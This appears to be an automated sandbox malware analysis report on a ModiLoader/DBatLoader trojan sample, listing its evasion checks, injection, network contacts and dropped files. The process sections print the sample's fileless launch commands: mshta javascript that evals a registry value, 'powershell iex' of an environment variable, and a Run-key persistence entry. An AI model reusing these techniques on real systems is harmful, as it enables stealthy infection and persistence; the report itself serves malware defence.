Malware Analysis Report

2024-10-19 07:03

Sample ID 240508-q5wprsff71
Target 2523d4c29b570652b608f5026b3f068e_JaffaCakes118
SHA256 856c83e4bd9e463cfc0ee5ad88ad9e459a540db080630ea19b9de42926ba4f2a
Tags
modiloader trojan evasion persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

856c83e4bd9e463cfc0ee5ad88ad9e459a540db080630ea19b9de42926ba4f2a

Threat Level: Known bad

The file 2523d4c29b570652b608f5026b3f068e_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader trojan evasion persistence

ModiLoader, DBatLoader

Process spawned unexpected child process

ModiLoader Second Stage

Looks for VirtualBox drivers on disk

Looks for VirtualBox Guest Additions in registry

Checks for common network interception software

Looks for VMWare Tools registry key

Checks computer location settings

Deletes itself

Checks BIOS information in registry

Adds Run key to start application

Maps connected drives based on registry

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-08 13:51

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-08 13:51

Reported

2024-05-08 13:53

Platform

win10v2004-20240419-en

Max time kernel

141s

Max time network

105s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2348 wrote to memory of 3436 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2348 wrote to memory of 3436 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2348 wrote to memory of 3436 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:xc3lhh="z9cdF";rY80=new%20ActiveXObject("WScript.Shell");P3HoWq="2D6pldQk";dYH3Y=rY80.RegRead("HKCU\\software\\0DxOGxhLb\\3fBPxE");Nla3og="X";eval(dYH3Y);UeoaBs9P="WRzE";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:gzivhcdo

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
BE 2.17.107.115:443 www.bing.com tcp
US 8.8.8.8:53 115.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 76.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

memory/4408-0-0x0000000000400000-0x0000000000460160-memory.dmp

memory/4408-1-0x0000000000457000-0x0000000000459000-memory.dmp

memory/4408-2-0x00000000007F0000-0x00000000008CC000-memory.dmp

memory/4408-3-0x0000000000400000-0x0000000000460160-memory.dmp

memory/4408-7-0x00000000007F0000-0x00000000008CC000-memory.dmp

memory/4408-5-0x00000000007F0000-0x00000000008CC000-memory.dmp

memory/4408-6-0x00000000007F0000-0x00000000008CC000-memory.dmp

memory/4408-4-0x00000000007F0000-0x00000000008CC000-memory.dmp

memory/4408-8-0x00000000007F0000-0x00000000008CC000-memory.dmp

memory/4408-9-0x00000000007F0000-0x00000000008CC000-memory.dmp

memory/3436-11-0x0000000002850000-0x0000000002886000-memory.dmp

memory/3436-12-0x00000000053F0000-0x0000000005A18000-memory.dmp

memory/3436-13-0x0000000005190000-0x00000000051B2000-memory.dmp

memory/3436-14-0x0000000005330000-0x0000000005396000-memory.dmp

memory/3436-15-0x0000000005A20000-0x0000000005A86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l4faytfh.zkk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3436-25-0x0000000005A90000-0x0000000005DE4000-memory.dmp

memory/3436-26-0x0000000005F40000-0x0000000005F5E000-memory.dmp

memory/3436-27-0x0000000005F90000-0x0000000005FDC000-memory.dmp

memory/3436-28-0x0000000007790000-0x0000000007E0A000-memory.dmp

memory/3436-29-0x0000000006460000-0x000000000647A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-08 13:51

Reported

2024-05-08 13:53

Platform

win7-20240419-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\cb8d1f\\a81118.bat\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2248 set thread context of 2108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2108 set thread context of 2188 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:tF9In=\"jPn\";f8G=new ActiveXObject(\"WScript.Shell\");y40ydZj=\"hmfqG\";S4Z4aE=f8G.RegRead(\"HKCU\\\\software\\\\epsehio\\\\uqkiailgu\");t6c6Xw=\"Yu8FQ\";eval(S4Z4aE);X5FveniU=\"5ww\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.94e8bf0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.94e8bf0\ = "5d7e4d" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\5d7e4d\shell C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2620 wrote to memory of 2248 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2620 wrote to memory of 2248 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2620 wrote to memory of 2248 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2620 wrote to memory of 2248 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2248 wrote to memory of 2108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2248 wrote to memory of 2108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2248 wrote to memory of 2108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2248 wrote to memory of 2108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2248 wrote to memory of 2108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2248 wrote to memory of 2108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2248 wrote to memory of 2108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2248 wrote to memory of 2108 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2108 wrote to memory of 2188 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2108 wrote to memory of 2188 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2108 wrote to memory of 2188 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2108 wrote to memory of 2188 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2108 wrote to memory of 2188 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2108 wrote to memory of 2188 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2108 wrote to memory of 2188 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2108 wrote to memory of 2188 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2523d4c29b570652b608f5026b3f068e_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:evu7Uft="uQfdRv";n34M=new%20ActiveXObject("WScript.Shell");rs3bwfqN="O";Lv74qy=n34M.RegRead("HKCU\\software\\B8HhGcjCN\\NI8xZRGM");QcY0x2uE="UPhI";eval(Lv74qy);Qa82xtZKR="f";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:swjn

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 18.121.133.153:80 tcp
US 48.161.123.199:443 tcp
US 48.197.44.255:443 tcp
US 128.128.122.183:80 tcp
US 68.104.213.172:443 tcp
US 129.10.2.191:443 tcp
PL 213.92.194.130:8080 tcp
TN 196.227.119.211:80 tcp
RU 94.41.23.112:443 tcp
SG 116.51.83.85:80 tcp
US 214.192.61.194:443 tcp
AU 58.175.1.110:8080 tcp
IT 37.159.126.243:80 tcp
JP 133.185.162.156:80 tcp
US 55.123.174.22:80 tcp
DE 213.70.239.149:443 tcp
US 19.105.20.24:80 tcp
CA 216.154.117.154:80 tcp
US 209.201.183.195:80 tcp
SG 168.138.171.119:80 tcp
EG 217.52.90.47:80 tcp
CA 173.250.33.189:443 tcp
JP 218.118.189.209:80 tcp
US 19.217.195.186:443 tcp
US 15.51.232.133:443 tcp
CN 119.182.167.48:443 tcp
US 214.98.122.18:80 tcp
NO 146.213.70.104:443 tcp
GB 109.152.218.203:443 tcp
TR 78.167.188.28:80 tcp
IN 171.56.129.97:80 tcp
US 164.228.246.37:80 tcp
JP 111.216.245.190:443 tcp
OM 148.151.7.40:443 tcp
UG 154.227.86.50:443 tcp
CN 115.173.61.65:443 tcp
CN 114.86.135.153:8080 tcp
GB 86.183.247.227:443 tcp
CN 27.153.134.230:443 tcp
US 144.168.75.165:443 tcp
SE 90.233.83.227:443 tcp
DE 85.151.66.146:443 tcp
IT 213.26.189.93:80 tcp
US 52.170.73.115:80 tcp
ES 83.63.233.21:80 tcp
US 166.161.72.126:443 tcp
US 174.244.9.242:443 tcp
BR 191.253.111.56:8080 tcp
US 69.179.129.43:8080 tcp
US 161.208.18.209:443 tcp
US 158.3.54.56:80 tcp
AR 190.175.15.67:80 tcp
CN 123.190.77.181:443 tcp
CN 39.104.217.189:80 tcp
FR 176.189.85.54:80 tcp
FR 52.143.188.179:80 tcp
IT 213.26.189.93:80 tcp
US 140.247.17.83:443 tcp
CN 139.200.242.117:80 tcp
US 23.126.196.145:80 tcp
US 168.168.162.39:443 tcp
IT 87.24.94.198:443 tcp
KR 39.112.245.225:80 tcp
TW 202.5.5.139:80 tcp
NL 84.26.27.8:443 tcp
HK 4.252.68.228:80 tcp
US 29.194.237.250:80 tcp
KR 123.111.15.122:443 tcp
CN 222.211.224.106:443 tcp
CN 116.144.106.242:80 tcp
US 22.178.125.57:443 tcp
US 173.42.209.80:80 tcp
US 215.89.197.26:443 tcp
KR 222.112.204.203:443 tcp
GB 217.42.65.41:443 tcp
TW 140.115.74.132:80 tcp
PL 193.107.11.133:443 tcp
US 215.127.254.143:80 tcp
US 185.161.253.60:80 tcp
US 166.35.231.247:443 tcp
GB 25.63.30.25:443 tcp
US 159.238.94.179:80 tcp
ZA 196.42.115.122:443 tcp
US 143.140.246.35:80 tcp
US 45.40.186.133:80 tcp
CN 27.10.194.60:443 tcp
DE 145.55.205.82:443 tcp
DE 35.158.228.137:80 tcp
CA 167.43.120.18:80 tcp
DE 35.158.228.137:80 35.158.228.137 tcp
CN 120.91.210.249:80 tcp
AU 203.54.247.163:443 tcp
CA 142.61.13.82:8080 tcp
KR 61.252.200.112:443 tcp
HU 193.226.223.110:443 tcp
HK 122.10.180.210:443 tcp
MU 196.166.116.141:443 tcp
JP 121.82.23.64:80 tcp
BG 88.80.111.64:443 tcp
CA 141.119.28.14:80 tcp
CN 121.14.174.249:443 tcp
NL 137.174.215.127:80 tcp
MU 196.164.150.241:443 tcp
US 215.109.170.145:443 tcp
US 67.124.194.118:80 tcp
TW 210.62.84.54:80 tcp
US 62.72.49.204:443 tcp
US 62.72.49.204:443 62.72.49.204 tcp
CN 182.119.85.145:443 tcp
US 11.92.63.68:80 tcp
US 192.91.195.151:80 tcp
GB 172.167.182.128:80 tcp
FJ 210.7.7.193:80 tcp
AT 212.27.85.130:8080 tcp
US 74.127.92.238:8080 tcp
US 67.133.12.115:80 tcp
DE 77.184.103.87:443 tcp
IN 49.40.136.136:443 tcp
PL 159.205.116.25:8080 tcp
US 32.243.39.147:443 tcp
US 164.50.19.220:443 tcp
US 98.21.174.131:8080 tcp
US 32.215.132.27:80 tcp
US 3.146.71.54:80 tcp
JP 210.136.26.245:80 tcp
IT 192.84.156.125:443 tcp
TN 196.229.59.176:80 tcp
US 209.32.198.9:80 tcp
RO 89.123.45.17:8080 tcp
US 28.6.226.36:80 tcp
US 64.146.81.167:443 tcp
CN 115.206.30.208:80 tcp
US 165.64.251.114:80 tcp
JP 175.131.104.155:443 tcp
NL 62.195.192.60:80 tcp
FI 193.199.120.146:80 tcp
DK 83.91.3.228:443 tcp
HK 223.119.103.236:80 tcp
US 65.230.194.188:80 tcp
CN 113.109.93.5:443 tcp
US 97.169.200.149:443 tcp
US 18.211.52.12:443 tcp
US 136.244.201.113:80 tcp
GB 25.234.19.216:80 tcp
SG 8.148.198.4:8080 tcp
US 76.168.55.1:443 tcp
US 6.143.255.121:443 tcp
CN 183.65.181.221:80 tcp
GB 86.178.132.5:443 tcp
US 100.58.150.146:80 tcp
NL 145.49.68.119:443 tcp
US 152.177.205.220:80 tcp
US 144.160.148.145:80 tcp
JP 150.34.43.15:80 tcp
CN 42.135.82.96:80 tcp
US 72.86.197.161:80 tcp
US 48.204.241.96:443 tcp
SE 185.167.177.33:8080 tcp
KR 218.234.188.173:8080 tcp
IN 101.221.194.59:443 tcp
US 198.157.77.241:80 tcp
US 34.222.79.62:80 tcp
FR 151.127.167.18:80 tcp
ZA 197.184.127.227:443 tcp
BR 191.18.73.2:8080 tcp
US 70.105.139.191:80 tcp
US 150.168.14.136:443 tcp
JP 114.149.168.12:443 tcp
GT 190.149.11.26:443 tcp
KR 115.41.32.96:443 tcp
US 184.83.22.20:80 tcp
CA 24.49.245.25:80 tcp
US 97.56.198.195:443 tcp
CN 120.13.102.191:80 tcp
BG 77.78.30.156:443 tcp
US 18.88.27.243:443 tcp
FR 78.239.155.15:80 tcp
IN 117.99.95.26:443 tcp
VN 14.226.118.88:443 tcp
SE 88.144.4.167:8080 tcp
TR 178.247.134.34:443 tcp
GB 212.135.27.113:8080 tcp
CA 132.221.252.74:80 tcp
CN 36.16.210.12:80 tcp
AU 1.148.239.110:80 tcp
KR 223.172.3.227:80 tcp
US 28.121.34.38:80 tcp
US 64.125.218.163:80 tcp
JP 150.52.69.208:80 tcp
US 54.186.67.138:443 tcp
KR 49.11.211.51:443 tcp
US 32.75.16.226:443 tcp
US 6.116.33.195:443 tcp
US 48.211.207.142:443 tcp
TW 61.58.232.171:443 tcp
US 192.103.208.53:443 tcp
CA 38.143.33.151:443 tcp
RU 89.223.55.181:80 tcp
US 206.208.66.3:443 tcp
US 96.31.254.29:443 tcp
US 168.109.58.148:443 tcp
US 192.239.86.59:443 tcp
CN 125.90.208.219:80 tcp
SE 193.183.39.22:443 tcp
IR 151.243.46.59:80 tcp
US 198.117.240.138:443 tcp
JP 211.15.20.85:80 tcp
CN 115.239.67.195:80 tcp
US 19.229.112.26:80 tcp
IL 80.179.64.89:443 tcp
ZA 160.184.242.132:8080 tcp
JP 106.161.160.245:443 tcp
US 48.84.88.98:443 tcp
JP 54.65.218.29:443 tcp
JP 121.110.239.235:80 tcp
US 131.193.233.130:443 tcp
AU 161.143.7.98:443 tcp
US 11.101.5.143:443 tcp
LT 81.7.69.37:443 tcp
RU 95.71.103.100:443 tcp
GB 140.238.96.160:80 tcp
VN 116.103.62.8:80 tcp
RU 95.28.223.136:80 tcp
US 151.103.134.151:8080 tcp
KR 119.209.6.158:80 tcp
US 4.133.47.185:80 tcp
AR 186.121.153.110:443 tcp
US 96.45.219.20:443 tcp
AU 131.217.73.162:443 tcp
US 64.248.78.142:443 tcp
GB 95.131.219.81:80 tcp
US 167.25.99.230:443 tcp
N/A 60.223.121.242:8080 tcp

Files

